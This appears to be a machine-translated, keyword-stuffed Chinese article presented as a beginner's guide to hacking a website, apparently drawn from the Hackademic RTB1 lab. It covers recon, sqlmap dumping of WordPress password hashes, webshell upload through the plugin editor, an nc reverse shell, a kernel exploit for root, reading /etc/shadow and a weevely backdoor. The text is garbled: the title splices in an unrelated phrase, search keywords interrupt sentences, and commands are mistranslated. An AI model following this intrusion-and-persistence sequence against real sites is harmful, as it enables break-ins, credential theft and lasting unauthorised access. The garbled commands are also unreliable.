怎么入侵网站数据库-从表中数据可知,薇甘菊入侵后
一篇科普文章,非常适合初学者,请静下心来阅读长文。 本文将通过图文并茂的方式来讲解黑客攻破网站的全过程。 通过本文,您将了解到黑客常见的入门思路和技术方法,适合热爱网络信息安全的新手朋友们了解和学习。 本文将从最初的信息收集开始,讲述黑客是如何一步步攻破你的网站和服务器的。
阅读本文后,您将了解以下内容:
渗透测试之前的简单信息收集。
sqlmap的使用
nmap的使用
nc 反弹特权升级
linux系统提权
backtrack 5等渗透测试工具nikto和w3af的使用。
假设黑客要入侵的网站域名是:hack-test.com
让我们使用 ping 命令获取 Web 服务器的 IP 地址
现在我们得到了网站服务器的IP地址:173.236.138.113
要查找同一服务器上的其他站点,我们使用 sameip.org。
26 个站点托管在 IP 地址 173.236.138.113 上
173.236.138.113 上有 26 个网站。 许多黑客可能会检查同一台服务器上的其他网站,以便攻破您的网站,但这次是为了研究目的。 我们会在服务器上搁置其他网站,只针对您的网站进行入侵检测。
我们需要有关您网站的以下信息:
DNS 记录(A、NS、TXT、MX 和 SOA)
Web 服务器类型(Apache、IIS、Tomcat)
注册商(拥有您域名的公司)
您的姓名、地址、电子邮件和电话
您网站使用的脚本(php、asp、asp.net、jsp、cfm)
您的服务器操作系统(Unix、Linux、Windows、Solaris)
您的服务器打开互联网端口(80、443、21 等)
让我们从查找您网站的 DNS 记录开始,为此我们使用 who.is。
我们发现您的DNS记录如下
让我们确定网络服务器的类型
查明你的web服务器是apache,然后确定它的版本。
IP:173.236.138.113
网站状态:活跃
服务器类型:Apache
Alexa 趋势/排名: 1 个月:3,213,968 3 个月:2,161,753
每次访问的页面浏览量:1 个月:2.0 3 个月:3.7
接下来就是寻找你的网站域名、你的电话号码、邮箱地址等注册信息了。
我们现已获取到您网站域名的注册信息,包括您的重要信息等。
我们可以通过backtrack5中的whatweb获取您的网站服务器操作系统类型和服务器版本。
我们发现您的网站使用著名的php整站程序wordpress,服务器系统类型为FedoraLinux,web服务器版本为Apache 2.2.15。 继续查看网站服务器开放端口怎么入侵网站数据库,使用渗透测试工具nmap:
1-Find services that run on server(查看服务器上运行的服务)
2-查找服务器操作系统(检查操作系统版本)
仅开放80端口怎么入侵网站数据库,操作系统为Linux2.6.22(Fedora Core 6)。 现在我们已经收集了有关您网站的所有重要信息,开始扫描以查找漏洞,例如:
SQL 注入 - 盲 sql 注入 - LFI - RFI - XSS - CSRF 等。
我们将使用 Nikto 来收集漏洞信息:
root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com
我们还将在 Backtrack 5 R1 中使用 W3AF 工具:
root@bt:/pentest/web/w3af#./w3af_gui
我们输入要检测的网址,选择完整的安全审计选项。
一段时间后,您将看到扫描结果。
发现您的网站存在sql注入漏洞、XSS漏洞等漏洞。 让我们讨论一下 SQL 注入漏洞。
%27z%220
我们通过工具在这个URL中发现了SQL注入,我们通过Sqlmap检测到了这个URL。
将 sqlmap 与 –u url 结合使用
一会儿你就会看到
输入 N 并按 Enter 继续
我们发现您的网站存在mysql错误注入,mysql数据库版本为5.0。 我们尝试通过添加参数“-dbs”来收集数据库名称。
找到三个数据库,然后通过参数“-D wordpress -tables”查看wordpress数据库的所有表名
使用参数“-T wp_users –columns”可以查看wp_users表中的字段。
接下来,猜测user_login和user_pass字段的值 。 使用参数“-C user_login, user_pass – dump”
我们将找到用户名和密码的哈希值。 我们需要通过以下在线破解网站来破解密码哈希值
登录wordpress后台wp-admin
尝试将 php webshell 上传到服务器以运行一些 linux 命令。 在插件页面上查找任何可编辑的插件。 我们选择Textile插件,编辑并插入我们的php webshell,点击update file,然后访问我们的phpwebshell。
phpwebshell被解析,我们可以控制你网站的文件,但是我们只是想获取网站服务器的root权限来入侵服务器上的其他网站。
我们使用NC弹壳,首先在我们的电脑上监听5555端口。
然后在Php webshell上反向连接我们的电脑,输入你的IP和5555端口。
点击链接,我们将看到
接下来我们尝试执行一些命令:
ID
uid=48(apache) gid=489(apache) groups=489(apache)
(用于显示用户的id和group)
密码
/var/www/html/Hackademic_RTB1/wp-content/plugins
(显示服务器上的当前路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息)
现在我们知道服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com搜索这个版本的相关漏洞。
在服务器上测试了许多漏洞之后,我们使用以下漏洞来提升权限。
我们在 nc shell 上执行以下命令:
wget -o roro.c
(下载exp到服务器,重命名为roro.c)
注意:linux内核的很多exp都是用C语言开发的,所以我们把它们保存为.c扩展名。
exp roro.c的代码如下:
通过上面的代码,我们发现exp是用C语言开发的,我们需要将其编译成elf格式,命令如下:
gcc roro.c –ororo
接下来执行编译好的exp
./roro
执行完成后,我们输入id命令
ID
发现我们已经是root权限了
uid=0(根) gid=0(根)
现在我们可以查看/etc/shadow文件
猫/等/阴影
我们可以使用“john theripper”工具来破解所有用户的密码。 但是我们不会这样做,我们需要在这个服务器上留一个后门,以便我们可以随时访问。
我们用weevely做一个php小马,上传到服务器。
1.weevely使用选项
root@bt:/pentest/backdoors/web/weevely#./main.py -
2.使用weevely创建密码为koko的php后门
root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko
然后上传到服务器后使用
root@bt:/pentest/backdoors/web/weevely#./main.py -t -u -pkoko
测试我们的 hax.php 后门
完成,撒花!
整理/夏立成,上海澜梦创始人兼CEO,复旦校友创新创业俱乐部副会长,致力于以IT外包网络维护服务赋能企业客户发展,助力企业客户创新、迭代、进化。